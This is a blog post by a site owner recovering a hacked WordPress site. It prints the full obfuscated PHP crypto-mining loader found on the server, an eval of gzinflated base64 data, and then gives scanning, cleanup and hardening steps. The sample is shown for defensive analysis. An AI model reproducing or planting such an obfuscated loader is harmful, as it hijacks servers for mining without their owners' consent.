In the last 24 hours, I have been the unfortunate recipient of a hacked WordPress site. Thankfully the site was non-critical and certainly not very popular. So rather than rush to restore the site, I’m taking the opportunity to understand firstly what was exploited to make this hack possible and secondly the remedy to stop this happening again.

The hack

Firstly, about the hack itself. Running a Google search on some of the source code left in the hackers files, I found out about crypto mining malware for CoinHive. The source code matched, however everything I found was about Drupal and not WordPress and mostly about JavaScript code, however this hack was done with PHP as you can see below:

<?php
eval("\n\$dgreusdi = intval(__LINE__) * 337;");
$a = "7VdrT+NGFP1eqf9hiCIcKwHFj7ClIQh2Bd1V6bIthVZC1Jo4k2QSvzR2674raF/94zDk78GLOou5W6Uo2M7Zlzz33MnTs3JzzgTsySlsa674CIXjhROtQ95fX1zo/W+/IbhONgjMOSkqBqRbnffpvcPumbtIeBg4CfdZAQdMOuh43OdJK52Qf3KySaNIh674vqxWRAzvFg/WxqHApG3SlpNZ03l5c/vjsjNCZNNwznnDlhwAbH2UeyCvW1zF/rR4U5h9zwpyCfBnTChMODJU+otD+HhpIiOk8pmB8u4RNL674iZazpDG7MB2RswNR6y1ReodlZIsNvLavv674xyUtuJ3JuyWuIwMxzDI/r18dN5BaBm7rCfcnFHJ8ltFUNkWDJQgSkZHvj+vSnn2+M8OJs8vri+jR+e2YYV7+vTj9cee9vbk57b65XZxfXhvHDL97k9W/n7942Mm+qBsAZFoycOB6748mMSpc/hGSNYjtSY9AckfGbKsQYZqpxKrHF674uez5cXv36lDsByIaLROaOYDGjwp3Wh7mYQRm+XwSVROryKVNcyKd/L6eqltXmlsJxeZVzLI2+mr42/Xw6Z068GPo8jvHdakYsjDzWkQHxPDoMBU2YYuciXGMu/LVvDHFpNApxw9rCGT7o9kmTHyFBPLYh1/v1C7qWm6Vys41c3hayu6uiBLzdhtm83f505JrsPmGBdNiJqKA+7A/FKCO7bfI7HXmdDuVU3zZnd3olO9ThKI/s6743cqWmW95Xx4LKxYdcsVSZUbDuuIer9No1uNzjW48/BAdlqlvV6sPR2ijcZLymcRG9MZW0XjGT2cz674aTWcgmfDaK4nA0GzNN18lgQCoanq/up0LQj61cFZIPhrOkIhaveJIWhbwC8JeW0cXGIw3e+F6xGlQqqyitQm61aKndAXgSTaMl674+kOeA4er+Gasd/dMzQFkLnTUJ6mglOP/ykLghRUUao279onpvKJIRCFkIy0u5fQ5jKK3eNk3+ZvtRYUS1tzRBOKDTVnH2vPgJNFsPU1dgVjQaGY5CgKB1BFtUIW7w46745UG674N5miihTDFNajUsQ2sl8o4fuKzahSmje29sAtnxk8iBaJwrfhYjxmIiutm+Fk6G1Su7j+e0bnc+//AOGBWfq2OqSHsZ582iXCXg+DB7hf4f4O9y674674urg/oQQQ/DdLbNBggwPiHQJC8IHOkFiADdhgAG674AYgBjAGQAZQBmHJaYTAiZUgO674TAiZ674DJ79faYIDNBZoLMhFKrWzYNIAtkFsgskFkgsyBkQciCkAUhG0pt4GzgbOkLcDZwNnD2qxKhDS674bQj0I9b7aZPmf8Ksj1FV9Iipa2imSI5I1duuy2Cd6pecfpmhF74zSeJs2bals2sbdkZ2BVKrsAiVRjdQu6d6fn+vk6AgbvL5Lk5fsYpT0a674UVJ7T8ocGDBauSltwMFn6do5y0iVGJVdoZV7xpGy+IAv49kJYiFmvpfDRMZYM674YyveVlza2G6+1Hbzs2w3S7YffAHTrZeabr3Y9DrhJ8v/sc2rKfcY6GUiHZOu2gw33QPDJ2VdXDo5PsbpplL71JLsD9IfM67StC674iPSDlPZNZvbf3/GaSMR4QW93BZj+D1mZkDdbf";
$a = str_replace($dgreusdi, "E", $a);
eval (gzinflate(base64_decode($a)));

This is a crypto-mining script. It is not easy to understand what it is achieving by looking at the source code, however, the whole idea of this script is to earn a crypto-miner some crypto-currency: crypto-miners get rewarded with crypto-currency to be the first to ensure “the authenticity of information and updating the blockchain with the transaction” – so you can understand very quickly why they go around hacking peoples websites…they are incentivised by money!

The vulnerability

Concerned about the potential impact to the WordPress community having only found information about vulnerabilities in Drupal being exploited to achieve this hack, I reached out on WordPress StackExchange, and the WordPress.org Support Forums. I was honestly surprised by the response! My understanding was an exploitation of WordPress, a plugin(s) or a theme, however nobody was interested in where the vulnerability was…just patch it up and add more layers of protection was the response I received…

From my point of view, the location of the vulnerability points towards the Contact Form 7 plugin, because one of the crypto-mining scripts was uploaded to the directory of this plugin. So, in the meantime, I’ll be investigating this plugin and any vulnerabilities that can be exploited to upload malware to the web server (I am much more interested in the “how” than the StackExchange or WordPress.org community).

The resolution

Inevitably, I do need to restore this site, and on WordPress.org there are two great articles you can read on how to recover from a hacked WordPress site, and how to harden your WordPress site to reduce the chances of it being hacked again.

Step 1: Find the infection

The security scan is the most important part of restoring your hacked website, without it the vulnerability may still exist and your headache could happen all over again!

When choosing the scanning software, you are going to need something server-side so that it can see all of the website files. For that reason I can recommend either Cerber SecuritySucuri Security or Wordfence Security, all of which are plugins for WordPress that will help you discover vulnerabilities now and in the future, should they occur.

I also recommend that you check with your website hosting provider if they provide a security scanning service. I host with 1&1 and it was their automated security scanning service that first alerted me to the website hack and, crucially, they automatically neutralised it as well.

Your computer could be infected!

This is unfortunately true. It could be that your computer is infected with the same hack or it was the fact that your computer was hacked in the first place that allowed the hackers to gain access to your website (e.g. sniffing FTP login credentials or tracing keys on your keyboard). Consequently, you should run anti-virus and anti-malware scanning software on your computer immediately. I can recommend THIS AND THAT, which have free 30 day trials so you don’t even need to pay for it.

Don’t progress until your scanning is complete!

Imagine if the hackers know when you login to any web server via FTP and they can capture both your username and password! That it why you don’t move forward until the scanning is complete – there’s no point changing your passwords until you find the infection.

Step 2: Fix the infection

Your security scan will often suggest a resolution to the infection it finds, so obviously I recommend to follow this advice. However, in the case of the CoinHive crypto-jacking malware infection I experienced, I was simply able to remove the following 4 files that were found by the security scan:

  • l9qlraeng.php
  • 7adotrr28g.php
  • y04tqyl3fu.php
  • co4q736bga.php

Clearly, the names of these files are randomly generated and so I’m sure if you experience the same hack that the filename will be different.

Whatever kind of hack you experience, you are going to need to either clean the files that have been altered or clean the database (or both). To find our more about what to do in these situations you can read:

Where you are at this point really depends how severe the infection was. You may well have cleaned the infection, and if you think you have done that, then you should run your security scans again. However, and unfortunately, it is still possible that remnants (and vulnerabilities) still exist in your website, which is why I recommend that you continue to Step 3.

Step 3: Change your usernames & passwords

How secure (i.e obscure) are both your usernames and passwords? You may not be able to change your usernames for your FTP or MySQL database accounts, however you can certainly for WordPress WP Admin access and your own computer!

  1. Change usernames where possible for FTP, MySQL databases, WordPress WP Admin & your own computer
  2. Change the passwords for these users as well (using long, complex & unique phrases) – use the LastPass password generator tool

Step 4: Maintenance mode

If your live website is still down, then I highly recommend placing it in maintenance mode so that visitors do not receive any kind of negative experience as a result of the hack and are instead informed that maintenance is going-on. You can do this manually by creating the “.maintenance” file in the website root and the “maintenance.php” file in the “wp-content” folder (read “How to manually enable and customize maintenance mode in WordPress” on Hostpapa for some help on this) or you can use a plugin such as Maintenance Mode, which is my favourite.

Step 5: Start again

I’m going to take a copy of my hacked site, so that I can further investigate how the hack might have occurred, and it is still a worthwhile backup for you to extract certain files when you need them.
However, then I’m going to create a fresh version of my website by:

  1. Creating a new database
  2. Installing the latest version of WordPress (from a fresh download)
  3. Installing the same theme & plugins that I had before (again, from fresh downloads)
  4. Then, most importantly, running a security scan of all the website files

Do not do this on your live web server!

It is possible that the vulnerability exists in a theme or plugin that you have installed and so you really do not want to be putting this back on your public web server – instead use a web server that is offline (your local server will do fine) and then when you are done re-creating your live site you can put it live.

Use version control!

It is in a situation like this especially when version control (such as Git and SVN) pay dividend. You should use version control for your theme (if it is bespoke or a child theme) at the very least – this is usually sufficient as everything else (WordPress core, plugins and parent themes) you can just download and install again.

Step 6: Harden WordPress

What can you do to stop this from happening again? It is the most important question – lesson’s have been learnt and it’s time to harden-up your website security. Here are my recommendations on how to do that:

  1. Security scanning & alerts: Install either Cerber SecuritySucuri Security or Wordfence Security
  2. Clean-up: Remove obsolete themes & plugins
  3. Limit access: Remove redundant user accounts
  4. Change usernames & passwords: For all accounts you decide to keep
  5. Schedule backups: Schedule backups of your database & website files on at least a daily basis to another location (i.e. not the same server that your website is on) using UpdraftPlus
  6. Update everything, manually: Manually update WordPress core, all themes & plugins and then check everything on your site to be sure it is working as you expect, then turn off automatic updates for WordPress core, and schedule a day, every month when you are going to login to the WP Admin and check for updates
  7. Set permissions: Set the recommended permissions for WordPress folders & files (see “Core Directories / Files” on WordPress.org)
  8. Secure wp-admin: Secure the “wp-admin” folder with password protection by following “How to Password Protect Your WordPress Admin (wp-admin) Directory” on wpbeginner – be sure to follow “Update: Here is how to fix the Admin Ajax Issue” as well
  9. Obfuscate wp-login: Use the Cerber Security plugin to change the login page URL from “wp-login.php” to some other random name
  10. Protect wp-includes: Protect the “wp-includes” folder by updating the .htaccess file in the website root as per “WP-Includes” on WordPress.org
  11. Protect uploads: Protect the “uploads” folder by creating an .htaccess file in the “uploads” folder as per “WP-Content/Uploads” on WordPress.org
  12. Protect wp-config: Protect the “wp-config.php” file by updating the .htaccess file in the website root as per “WP-Config.php” on WordPress.org
  13. Disable file editing: Disable the file editing from the WP Admin by adding define('DISALLOW_FILE_EDIT', true); to “wp-config.php”

Step 7: ?

What else would you do? Do you have any recommendations? Let me know in the comments below…

Questions or comments?

I've made it very easy for you to send me a question or a comment regarding what you have just read - all you need to do is login with Facebook below, post your question, and I'll reply directly.

Pin It on Pinterest